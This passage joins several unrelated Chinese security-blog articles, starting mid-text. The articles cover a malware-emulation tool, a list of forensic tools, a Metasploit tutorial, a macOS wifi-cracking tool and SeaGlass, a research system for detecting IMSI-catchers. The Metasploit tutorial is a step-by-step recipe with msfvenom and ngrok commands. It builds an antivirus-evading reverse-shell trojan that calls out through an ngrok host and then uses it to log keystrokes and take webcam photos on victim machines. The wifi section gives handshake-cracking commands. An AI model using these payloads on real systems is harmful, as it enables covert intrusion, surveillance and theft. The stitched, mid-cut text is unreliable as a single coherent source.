 因为完成了文件系统所以WxSpectre如果捕获到有文件的创建,写入都会被监控。且可以dump创建出的文件。

 3.虚拟调试(virtual debugger) 

这个功能是非常有用的。因为通常情况下调试病毒必须在虚拟机里面调试。分析者通常需要反复的还原虚拟机,将样本用调试器加载起来,这样会耗费很多的时间。WxSpectre的虚拟调试,完全不依赖虚拟机,启动非常的快。对调试病毒非常的方便。 

4. 虚拟注册表&文件监控 

监控注册表的访问,读,写,设置,文件及文件夹的创建,读,写,删除等。 

5. 进程创建监控 

6. 内存dump&及内存字符串dump

三、demo情况

Api trace:

病毒名:DDoS:Win32/Nitol.A

Md5: 4666a8eef0e51323f85f569e083f5bc4、

VT: https://virustotal.com/en/file/c454119514c44e64df45d83160ca7b8a06c87a2b167b16700baa4e0cacafe95a/analysis/

基于unicorn-engine的虚拟机的实现(WxSpectre)

Drop样本释放的文件:

病毒名:wanncry2.0

Md5: 84c82835a5d21bbcf75a61706d8ab549

VT: https://virustotal.com/en/file/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa/analysis/

基于unicorn-engine的虚拟机的实现(WxSpectre)

WxVFS监控到的病毒创建出来的文件

基于unicorn-engine的虚拟机的实现(WxSpectre)

对应的文件内容

更多关于脱壳能力,注册表监控,进程创建监控,虚拟调试,内存字符串dump,执行速度,这里完整的演示视频。

四、待完成部分

目前脚本执行模块还在完善,调试功能还没有完成。网络模块还没有完成,脱壳能力还需要改善。等到机会合适我将放出这个工具。

* 本文作者:比尔.盖茨(twitter@ma1fan),本文属FreeBuf原创奖励计划,未经许可禁止转载

22款受欢迎的计算机取证工具

计算机取证是与计算机和网络犯罪有关的,一门非常重要的计算机学科分支。在早前,计算机只用于生成数据,但现在已扩展到与数字数据相关的所有设备。计算机取证的目标是通过使用数字资料的证据来进行犯罪调查,以找出网络相关罪行的主要责任人。

为了更好的用于研究和调查,开发人员创建了多样的计算机取证工具。公安部门和调查机构可以根据自身情况,如预算和现有专家队伍等因素,来选取合适的取证工具。

这些电脑取证工具,也被分为了不同的类别:

  • 磁盘和数据捕获工具
  • 文件查看器
  • 文件分析工具
  • 注册表分析工具
  • 互联网分析工具
  • 电子邮件分析工具
  • 移动设备分析工具
  • Mac OS分析工具
  • 网络取证工具
  • 数据库取证工具

在本文中,我将为大家罗列一些当前流行的计算机取证工具。这里需要说明的是,本文中工具是以随机顺序添加的,并不代表工具的排名。

1. Digital Forensics Framework

数字取证框架是另一个专门用于数字取证的流行平台。该工具是开源的,并具有GPL许可证。它同时适用于专业或非专业人员,简单易用。它可以用于数字监管链,访问远程或本地设备,Windows或Linux操作系统的取证,恢复隐藏已删除的文件,快速搜索文件的元数据以及其他各种功能。

下载:http://www.digital-forensic.org/

2. Open Computer Forensics Architecture

开放式计算机取证架构(OCFA)是另一种流行的分布式开源计算机取证框架。该框架建立在Linux平台上,并使用postgreSQL数据库存储数据。

它由荷兰国家警察局创建,用于自动化数字取证过程。它可以根据GPL许可证下载。

下载:http://sourceforge.net/projects/ocfa/

3. CAINE

CAINE(计算机辅助调查环境)是用于数字取证的Linux发行版。它提供了一种以用户友好的方式将现有软件工具集成为软件模块的环境。这个工具是开源的。

阅读更多:http://www.caine-live.net/

4. X-Ways Forensics

X-ways Forensics是由德国X-ways出品的一个法证分析软件,它其实是Winhex的一个法证授权版,跟Winhex界面完全一样。它可以运行在所有可用的Windows版本上。下面是它的一些主要功能:

  • 磁盘克隆和镜像功能,进行完整数据获取
  • 可分析 RAW/dd/ISO/VHD/VMDK 格式原始数据镜像文件中的完整目录结构,支持分段保存的镜像文件
  • 支持磁盘,RAID,扇区大小为8KB最大2TB的镜像的完全访问
  • 支持对JBOD、RAID0、RAID 5、RAID 5EE, RAID 6, Linux软RAID, Windows动态磁盘和LVM2等磁盘阵列
  • 自动识别丢失/删除的分区
  • 支持FAT12, FAT16, FAT32, exFAT, TFAT, NTFS, Ext2, Ext3, Ext4, Next3, CDFS/ISO9660/Joliet, UDF文件系统
  • 无需修改原始硬盘或镜像纠正分区表或文件系统数据结构来解析文件系统
  • 察看并获取 RAM和虚拟内存中的运行进程
  • 多种数据恢复功能,可对特定文件类型恢复
  • 基于GREP符号维护文件头签名数据库
  • 支持20种数据类型解释
  • 使用模板查看和编辑二进制数据结构
  • 数据擦除功能,可彻底清除存储介质中残留数据
  • 可从磁盘或镜像文件中收集残留空间、空余空间、分区空隙中信息
  • 创建证据文件中的文件和目录列表
  • 能够非常简单地发现并分析ADS数据(NTFS交换数据流)
  • 支持多种哈希计算方法 (CRC32, MD4, ed2k, MD5,SHA-1, SHA-256, RipeMD…)
  • 强大的物理搜索和逻辑搜索功能,可同时搜索多个关键词
  • 在NTFS卷中为文件记录数据结构自动加色
  • 书签和注释
  • 可以运行在Windows FE中等Windows环境
  • 配合F-Response可进行远程计算机分析等

完整介绍请点击:http://www.x-ways.net/forensics/

5. SANS数字取证工具包 – SIFT

SIFT是SANS推出的数字取证工具包,SIFT以VMware虚拟映像的形式发布,里面集成了数字取证分析所有必须的工具。适用于Expert Witness Format (E01), Advanced Forensic Format (AFF),和 raw (dd) evidence formats。 今年早些时候,SIFT 3.0发布。

在resource.infosecinstitute.com上的一篇文章中,我们已经详细介绍了SIFT。你可以阅读关于SIFT的这些帖子,以了解更多有关SIFT取证平台的信息。

下载:http://digital-forensics.sans.org/community/downloads

6. EnCase

EnCase是另一款流行的多用途取证平台,具有许多不错的取证工具。该工具可以快速收集各种设备的数据,挖掘潜在的证据。它还会根据收集的证据生成相应的报告。

该工具并不免费。 授权费用为995美元。

阅读更多关于EnCase的信息:https://www.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx

7. Registry Recon

Registry Recon是一款流行的注册表分析工具。它可以从证据中提取注册表信息,然后重建注册表。它还可以从当前和之前的Windows安装重建注册表。

阅读更多:http://arsenalrecon.com/apps/recon/

8. The Sleuth Kit

Sleuth Kit是一个基于Unix和Windows的工具,可帮助你对计算机进行取证分析。它配备了各种有助于数字取证的工具。这些工具有助于分析磁盘映像,对文件系统进行深入分析以及其他各种功能。

阅读更多:http://www.sleuthkit.org/

9. Llibforensics

Libforensics是一个是专门用于获取和分析数字取证的数字取证应用程序库。它是由Python开发的,并附带各种演示工具以便从各种类型的证据中提取信息。

阅读更多:http://code.google.com/p/libforensics/

10. Volatility

Volatility是一个内存取证框架。主要用于事件响应和恶意软件分析。使用此工具,你可以从正在运行的进程,网络套接字,网络连接,DLL和注册表蜂巢提取信息。它还支持从Windows故障转储文件和休眠文件中提取信息。此工具根据GPL许可证免费提供。

阅读更多:http://code.google.com/p/volatility/

11. WindowsSCOPE

WindowsSCOPE是用于分析易失性存储器的另一种内存取证和逆向工程工具。它主要用于恶意软件的逆向工程。它提供了分析Windows内核,驱动程序,DLL,虚拟和物理内存的功能。

阅读更多:http://www.windowsscope.com/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=35&category_id=3&option=com_virtuemart

12. The Coroner’s Toolkit

Coroner工具包或TCT也是一个非常好用的数字取证分析工具。它运行在几个与Unix相关的操作系统下。它可用于计算机灾难分析和数据恢复。

阅读更多:http://www.porcupine.org/forensics/tct.html

13. Oxygen Forensic Suite

Oxygen取证套件主要用于手机上的证据收集。Oxygen会为我们收集设备的各种信息(包括制造商,操作系统,IMEI号码,序列号),联系人,消息(电子邮件,短信,彩信),还可以恢复已删除的消息,通话记录和日历信息。

阅读更多:http://www.oxygen-forensic.com/en/features

14. Bulk Extractor

Bulk Extractor(批量提取器)也是一款重要和流行的取证工具。它会扫描文件的磁盘映像,文件或目录以提取有用的信息。由于在这个过程中,它忽略了文件系统结构,所以它比其他同类型的工具执行速度要快许多。情报和执法机构基本上都会用这款工具,来解决一些网络犯罪问题。

下载:http://digitalcorpora.org/downloads/bulk_extractor/

15. Xplico

Xplico是一款开源的网络取证分析工具。主要用于,从使用Internet和网络协议的应用程序中提取有用的数据。它支持大多数流行的协议,包括HTTP,IMAP,POP,SMTP,SIP,TCP,UDP,TCP等。该工具的输出数据,会被存储在MySQL数据库的SQLite数据库中。同时,它也支持IPv4和IPv6。

阅读更多:http://www.xplico.org/about

16. Mandiant RedLine

Mandiant RedLine是一款流行的,用于内存和文件分析的工具。Mandiant RedLine主要收集有关在主机上运行的进程信息,内存中的驱动程序,并收集其他数据,如元数据,注册表数据,任务,服务,网络信息和Internet历史记录,并最终构建适当的报告。

阅读更多:https://www.mandiant.com/resources/download/redline

17. Computer Online Forensic Evidence Extractor (COFEE)

计算机在线法庭科学证据提取器,是专为计算机取证专家开发设计的一款工具包。该工具由Microsoft开发,用于从Windows系统收集证据。它可以被安装在USB驱动器或外部硬盘上。取证人员只需将USB插入目标计算机中,即可进行实时的分析。COFEE包含了超过150个信息收集、密码破解、网络嗅探等工具。而且它的分析速度也非常的快,大概在20分钟左右就可以完成对目标系统的完整分析。对于执法机构,此外,Microsoft还为使用该工具的执法机构,提供免费的技术支持。

官方站点:https://cofee.nw3c.org/

18. P2 eXplorer

P2 eXplorer 这款取证图像挂载工具的设计旨在帮助调查员管理和调查证据。利用 P2 eXplorer,您可以将取证图像作为只读的本地逻辑磁盘和物理磁盘进行挂载。一旦挂载完毕,您可以使用 Windows Explorer 浏览图像内容,或将其加载到您的取证调查分析工具中。因为将图像作为物理磁盘挂载,您可以查看已删除的数据、以及未分配的图像空间。

它可以一次安装多个图像。 它支持大多数图像格式,包括EnCasem,safeBack,PFR,FTK DD,WinImage,以及来自Linux DD的RAW图像,和VMWare图像。

此工具有收费和免费版本,收费版本需要支付$199,免费版本的部分功能将无法使用。

阅读更多:https://www.paraben.com/p2-explorer.html

19. PlainSight

PlainSight是一个基于Knoppix(Linux发行版)的Live CD,它允许用户执行数字取证任务,如查看互联网历史记录,数据刻画,USB设备使用信息收集,检查物理内存转储,提取哈希密码等。

此工具是免费的。

阅读更多:http://www.plainsight.info/index.html

20. XRY

XRY是Micro Systemation开发的移动取证工具。它用于分析和恢复来自移动设备的关键信息。该工具附带硬件设备和软件。硬件将手机连接到PC,软件对设备进行分析并提取数据。它旨在恢复数据以用于取证分析。

该工具的最新版本可以恢复来自Android,iPhone和BlackBerry等各种智能手机的数据。它还可以收集已删除的数据,如通话记录,图像,短信和短信。

阅读更多:http://www.msab.com/xry/what-is-xry

21. HELIX3

HELIX3是一个基于Linux的Live CD,用于事件响应构建,计算机取证和电子发现方案。它包含了一堆开源工具,从十六进制编辑器到数据刻画软件到密码破解工具等。

注意:你需要的HELIX3版本是2009R1。此版本是HELIX由商业供应商接管之前可用的最后一个免费版本。HELIX3 2009R1今天仍然有效,并为数字取证工具包提供有用的补充。

当使用HELIX3向导时,会询问是要加载GUI环境还是将HELIX3安装到磁盘。如果选择直接加载GUI环境(推荐),将出现一个基于Linux的屏幕,你可以选择运行捆绑工具的图形化版本。

Helix3 2008R1可以在这里下载到:https://e-fenseinc.sharefile.com/d/sda4309a624d48b88

企业版下载:http://www.e-fense.com/h3-enterprise.php

22. Cellebrite UFED

Cellebrite UFED取证产品是一款独立的既适合在犯罪现场也适合在实验室使用的设备。Cellebrite UFED能够从全球1200多款手机中提取重要数据如电话簿、图片、视频、文本短信息、通话记录、ESN和IMEI信息。UFED支持CDMA, GSM, IDEN和TDMA技术,并兼容所有的无线载波信号。Cellebrite UFED支持目前市场上95%的掌中设备,包括手机和PDA(Palm OS,Microsoft, Blackberry, Symbian)。不需要计算机的配合,方便在现场使用,通过简单操作就可以存储上百条电话簿和联系人信息到一张SD卡或者USB 中。

Cellebrite UFED支持所有已知手机设备的接口,包括串口、USB接口、红外和蓝牙。提取的数据可以带回实验室利用报告/分析工具进行查看和校验。现场提取数据保证在犯罪分子有机会毁坏手机或清除数据之前,保存和查看手机里的信息。

更多信息:http://www.cellebrite.com/Mobile-Forensics

总结

以上列举的都是些执法机构在进行网络犯罪调查时,常用到的数字取证工具。本文我为大家介绍了各种类型的工具,如如高级,免费,开源类的,针对计算机的取证,以及针对手机的取证等。如果你想学习或正在学习取证相关的知识,我建议大家可以下载以上列举的这些工具,进行深入的研究与学习。这将会有助于提高你的学习效率。

除了本文列举的这些工具,其实市面上还有很多类似的优秀的工具。这需要大家自己去试验和挖掘。

进一步阅读数字取证的相关内容:

http://www.forensics.nl/

http://en.wikipedia.org/wiki/Digital_forensics

http://www.cio.com/archive/030101/autopsy.html

*参考来源:infosecinstitute,FB小编 secist 编译,转载请注明来自FreeBuf(FreeBuf.COM)

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法

我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用!这是怎么做到的呢?

这个问题的实现需要拆分成下面三个模块

内网穿透到外网

制作免杀木马后门

Metasploit控制客户机

环境准备

操作系统 用途 IP地址 需要软件
Kali 制作payload,攻击,映射端口 192.168.1.130 Metasploit Ngrok
Win7 制作payload 省略 VC++6.0
Win10 客户机 任意公网地址

 内网穿透到外网

首先我们需要下载一个用于内网穿透的工具来进行端口映射与转发。

这里我用的是linux64bit

https://www.ngrok.cc/#down-client

接下来在上面的网站自行注册申请,然后登陆。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

然后申请免费隧道,选择TCP协议,自定义远程端口,本地IP地址就是kali的IP地址,端口自定义,但不要冲突。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

这里请记住隧道id,以及自定义远程端口,kali本机端口

将下载的客户端放置于指定目录,cd到目录,在命令行运行ngrok

./sunny clientid 隧道id

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

这样就完成了端口映射,它能将外网端口接收到的数据返回到本机kali的指定端口。内网穿透的用途很多,下面给出说明,这里不再赘述。

https://ngrok.com/docs

 制作免杀木马后门

首先,在kali中用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘/x00’lhost=server.ngrok.cc lport=11206 -f c

上面命令中,-p选择指定payload,–e选择制定编码器(不同编码器免杀效果也有不同,部分编码器应对火绒等杀软效果显著), -i 编码次数,-b 去多余/坏字符,lhost是你申请的ngrok服务器地址 lport是自定义的远程端口,-f 生成指定格式。

我这里选择生成基于C语言的数组,当然你也可以用以下命令直接得到exe木马,但这样免杀效果会打折扣,经笔者测试多次,重复编码12次后免杀效果非常强大!

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘/x00’lhost=server.ngrok.cc lport=11206 -f exe > haya.exe

然后复制buf数组

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

在win7下用VC6.0对下面代码进行编译,得到木马。

#include <stdio.h>
#pragmacomment( linker, "/subsystem:/"windows/" /entry:/"mainCRTStartup/"")//运行时不显示窗口
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
main()
{
((void(*)(void))&buf)();
}

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

 Metasploit控制客户机

切到Kali,使用Metasploit进行监听。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

设置监听攻击模块,监听载荷,IP(kali本机),端口(ngrok里自定义的本地端口),然后exp。

use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
exploit

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

当客户机执行木马后,得到一个meterpreter,可以进行的操作你懂的哈哈。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

list一些meterpreter的常用命令。

Download(upload) path 下载(上传)指定目录文件
ps 列出当前系统进程
Kill uid 消灭指定uid系统进程
keyscan_start 开始键盘记录软件
webcam_snap 拍照
截屏 screenshot

关于隐藏木马,加陌生壳,自启动,文件包含,进程转移等各种姿势加强木马强度就需要大家自行测试了 

通入上述步骤得到的木马经过笔者测试可以通过360,腾讯管家,Windows defender,小红伞等杀毒软件的查杀。动态免杀中,对于360,如果exe没有放在C盘或者U盘运行就可以做到动态免杀,仅仅会在拍照等特敏感操作会有提示,其他操作全程不报毒,defender腾讯管家就更弱了,拍照也不会有任何提示。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控Metasploit实验:制作免杀payload+对任意“外网”主机的远控

 

后记:通过此次实验,更加了解了信息安全的重要性。免杀和杀软是永远的对头,但是两者相互抗衡其实加速了安全行业的发展,没有绝对安全的系统,攻防相互对立却又彼此依存,攻防应合一。


文章参考:

http://blog.csdn.net/lzhd24/article/details/50664342

http://www.freebuf.com/sectool/118714.html

http://www.hackdig.com/?03/hack-2030.htm

*本文作者:haya,转载请注明FreeBuf.COM

Mac OS下的wifi自动破解工具xwifi

*本文原创作者:quanyechavshuo,本工具仅供安全技术学习和教育用途,禁止非法使用!本文属FreeBuf原创奖励计划,未经许可禁止转载

由于macOS下有两个缺陷,目前没有合适的wifi破解方案,于是作者写了这样一个支持macOS新版本系统下的wifi破解工具xwifi,可以在新版本macOS上自动破解wifi,适用于物理机装mac系统,理论上支持所有版本苹果系统。

Disclaimer

[!] legal disclaimer: Usage of xwifi.py for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.Developers 
assume no liability and are not responsible for any misuse or damage caused by this program.

Requirement

1.macOS[test with:macOS sierra 10.12.3/5]

2.need airport
macOS sierra系统自带

3.need aircrack-ng
brew install aircrack-ng

About

由于macOS下有2个缺陷:

a.aircrack-ng官网说airodump-ng和aireplay-ng在macOS不支持
b.新版本的macOS还没找到可利用的wifi破解工具(https://github.com/IGRSoft/KisMac2支持老mac系统)于是有了本工具,本工具可在新版本macOS上自动破解wifi,适用物理机装mac系统,理论上支持所有版本苹果系统

Attention

1.由于macOS下没有找到aireplay-ng的替代品,因此无法主动攻击,本工具采用的是不断sniff并自动检测是否抓到握手包并自动破解

2.抓到握手包后有两种破解方式:
a)aircrack-ng破解
eg.aircrack-ng -w ......./pass.txt -b 50:bd:5f:6e:3f:44 /tmp/*.cap
本工具中用这种方式破解
b)hashcat破解
要将cap文件转成hashcat支持的格式再用hashcat破解
1)将https://github.com/hashcat/hashcat-utils/releases里面的cap2hccapx.bin放到kali64(vm)下运行得到hccapx
2)然后再运行eg.hashcat -a 3 -m 2500 output.hccapx ?d?d?d?d?d?d?d?d

3.代码里有个关键操作是主进程里开2个子进程,如果用成2个子线程则无法工作,应该是因为2个不同的分支要执行不同的系统命令,要想多分支执行不同的系统命令(os.system)最好用多进程不能多线程,因为如果某个分支中要执行的系统命令是阻塞式的如ping就可以了

更多详情请参见此链接

项目地址参见此链接

*本文原创作者:quanyechavshuo,本文属FreeBuf原创奖励计划,未经许可禁止转载

SeaGlass:手工搭建伪基站监控系统

“伪基站”即假基站,设备一般由主机和笔记本电脑或手机组成,通过短信群发器、短信发信机等相关设备能够搜取以其为中心、一定半径范围内的手机卡信息,利用2G移动通信的缺陷,通过伪装成运营商的基站,冒用他人手机号码强行向用户手机发送诈骗、广告推销等短信息。近两年BAT3在国内搭建了强大的伪基站监控系统,在打击犯罪上贡献不少。

最近数年来,随着伪基站、黄貂鱼(IMSI-catcher)技术的快速发展,大家的手机很容易被这类设备信号劫持。它们可以精确定位手机、窃听通信、发送垃圾信息甚至远程植入木马。

SeaGlass:手工搭建伪基站监控系统

IMSI-catcher

近期泄漏数据和公开请求记录显示,美国政府在巴尔的摩、密尔沃基、纽约、塔科马、阿纳海姆、图森等多个城市的执法行动中使用过黄貂鱼,放在机动车或者飞机上来识别和定位嫌疑犯。这类强大的监控装置长期处于司法监督空白区域,为了提高透明度和问责制度,我们应该关心谁使用了、用了多久、何时使用等信息。SeaGlass是由华盛顿大学的安全研究人员设计的系统,用于观测城市中的伪基站、黄貂鱼的活动情况。SeaGlass硬件以上为背景介绍,下边我们来看SeaGlass的硬件部分,主要是传感器。传感器收集所有基站信号数据并上传至服务器,它利用算法去识别可能存在的黄貂鱼信号。

传感器部件

  • 1.Raspberry Pi电脑
  • 2.蜂窝调制解调器扫描细胞频谱
  • 3.全球定位系统
  • 4.诱饵手机
  • 5.移动热点上传数据                                                                                                      

SeaGlass:手工搭建伪基站监控系统

传感器部件

SeaGlass传感器采用现成的零件,装在箱子里,并安装到车子的后备箱。当车子在城市行驶时,传感器会不断收集和上传发射塔信号数据到云端。

SeaGlass:手工搭建伪基站监控系统

这些传感器比手机更具有优势,因为它们有专门的蜂窝扫描组件和外部天线,用于接收到更多的信息。虽然手机上装个应用也可以看到当前连接基站的有限信息,但传感器一次可以观测数百个无线频道和接收数十个广播属性。

全市收集

我们在西雅图、密尔沃基两个城市内进行尝试,在两个月内收集了数百万次观测。

西雅图和密尔沃基的测量范围如下图,热图颜色表示每平方公里的测量次数,动图显示两个月内扫描到的所有基站位置。

西雅图(图像放大到市中心)

SeaGlass:手工搭建伪基站监控系统

SeaGlass:手工搭建伪基站监控系统

密尔沃基(图像放大到市中心)

SeaGlass:手工搭建伪基站监控系统

SeaGlass:手工搭建伪基站监控系统

每个基站都有不同位置的数百或数千个测量结果,这让我们可以准确地对潜在基站进行建模。在西雅图共找到了超过1400个不同的基站,在密尔沃基找到了600多个。

西雅图Lake Union地区某个基站在两个月内周围信号的变动如下所示:

SeaGlass:手工搭建伪基站监控系统

红色为较强信号,蓝色为弱信号

通过对每个基站的典型行为进行建模,SeaGlass能找出存在异常行为的基站。

算法

黄貂鱼的监控行为非常隐蔽,但如果你有足够密度的城市蜂窝网络分布图视图,便能够检测到相关的异常行为。

我们设计了检测方法,可以在项目收集的数据上自动标记异常点。SeaGlass项目对这几个异常特征进行检测:

欺骗信号

为了以正常蜂窝网络相同的频率进行信号广播,黄貂鱼可以模拟合法基站的可识别属性(MCC、MNC、基站ID等)。黄貂鱼通常会使用更强的信号广播来劫持手机,并远离模拟的真基站,以避免干扰到真基站的运作。

为每个基站建立模型,显示出基站信号的位置分布,可以很容易识别出与正常信号分布不符的信号。如图所示,在基站7843的信号分布图上,较暗的颜色代表更强的信号,较大尺寸代表统计观测到的异常结果,请注意底部的大圆点。

SeaGlass:手工搭建伪基站监控系统

异常频道

为避免干扰基础网络,黄貂鱼假冒附近基站时,会在不同频率/频道上广播信号。大多数基站只在一个或两个频道传输信号,如果某个基站总是不停地换频道,那么很可能是附近有人在用黄貂鱼。

如图显示了某个基站ID在6个频道上进行广播,位置是西雅图南部的地方单位公民和移民服务(USCIS)大楼附近。可以比较的是,本次数据中没有发现有任何其它基站在超过3个频道上传输的,96%以上的基站仅在单个频道上传输。图中不同颜色代表不同频道,尺寸代表接收信号强度。请注意USCIS大楼附近的异常颜色区域。

SeaGlass:手工搭建伪基站监控系统

异常信号属性

每个基站都会广播自身的配置属性,以便手机调整信号、通报基站支持的功能。这些属性是独特的,但同一城市、同一运营商下基站的大部分属性都相同。SeaGlass项目在收集两个城市不同运营商广播信号时,会统计相关属性分布。

黄貂鱼必须广播自己是某运营商网络的基站,除非窃听者将它配置为完全仿照模式(所有属性和该网络基站一致),否则它是可识别的。

继续看图,如图显示了西雅图塔科马国际机场附近某个基站ID的观测数据,在两个月内它被观测到2千多次,属性信息非常稳定,和该网络下其它基站一致。但有一次信号异常,属性信息远超出西雅图网络内所有基站的预期范围,即图中红点,出现四种异常的BCCH属性(MSTXPWR, RXACCMIN, CRH, T3212)。

SeaGlass:手工搭建伪基站监控系统

时间变化

与正常基站不同,黄貂鱼通常被设计为便携、短时间使用、对感兴趣目标的长期监听。某些情况下,当有临时需求时会需要移动真实基站去支援,比如体育赛事,不过这种情况不多见。因此,任何短时间使用传输的基站都是可疑的,应该需要调查。

在统计数据中,我们找到一些临时基站,但进一步调查显示,它们大概率只是日常维护中关闭的基站。

结果验证

研究团队正尝试通过一些二手信息源来验证结果,比如公开请求记录。SeaGlass检测到了许多可疑的信号,由于没有独立验证,现在还不能肯定说这些可疑信号就是黄貂鱼造成的。

技术细节

关于SeaGlass传感器的详细信息,传感器、数据采集系统、检测算法和结果,大家可以在研究团队发布的论文中看到。

相关代码放在Github上。

【参考】https://seaglass.cs.washington.edu/

*本文作者:Shun,转载请注明FreeBuf.COm